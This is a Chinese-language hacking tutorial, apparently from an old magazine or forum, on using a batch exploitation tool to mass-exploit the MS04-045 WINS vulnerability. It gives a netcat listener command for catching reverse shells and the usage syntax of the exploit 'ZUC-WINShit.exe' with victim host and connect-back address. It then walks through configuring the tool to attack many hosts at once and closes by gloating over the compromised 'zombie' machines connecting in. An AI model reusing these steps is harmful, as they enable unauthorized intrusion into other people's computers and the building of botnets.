1.批量监听反向连接
有许多溢出程序为了防止防火墙拦截,都是采用反向连接的方式,由溢出主机向被溢出主机指定的端口发送一个CMD Shell,MS04045溢出漏洞也是如此。因此在溢出攻击前,一般首先要使用nc在本地监听一个指定的端口,以接收反向连接过来的Shell。因为是进行批量溢出,因此我们要打开多个监听窗口,以便接收多个反向连接Shell。每个都用手动打开太麻烦,可以在批量溢出工具中进行设置。
在软件界面中勾选“反向连接方式”,在“监听命令”中输入监听命令行:“nc.exe -vv -l -p 1234”,这里的监听端口随便指定一个未使用的端口就可以了。然后在“运行”后输入要同时打开的监听窗口数目,一般设置为5个就可以了。设置完毕后,点击“监听”按钮就可以在本地打开命令窗口进行监听了。
2.批量进行正向连接
如果不需要反向连接避开防火墙,那么在溢出成功后,还要远程连接登录溢出端口来获得Shell。同样的也可以设置批量正向连接。勾选界面中的“溢出后尝试连接到”项,在后面输入要连接的远程主机端口就可以了。
批量溢出“肉鸡”成群
WINS服务溢出程序名称为ZUC-WINShit,溢出程序的使用格式为:
“ZUC-WINShit.exe <victim-host> <connectback-ip> <connectback port>”
现在对目标发起攻击了,先在界面上的“程序名”中输入溢出程序名称“ZUC-WINShit.exe”。“前缀名称”项,指的是在命令格式中位于攻击的IP地址前的参数,比如像以前的MS0411溢出程序要根据攻击目标操作系统不同,使用0或1等进行区别。这里没有前缀参数。然后勾选“后缀参数”项,在其中按溢出程序格式填入本地的IP地址和反向连接端口(图2)。
剩下的事就是坐下来泡杯茶,看着肉鸡们一个接一个地连接到我们的机子上,心里感觉那个爽啊!
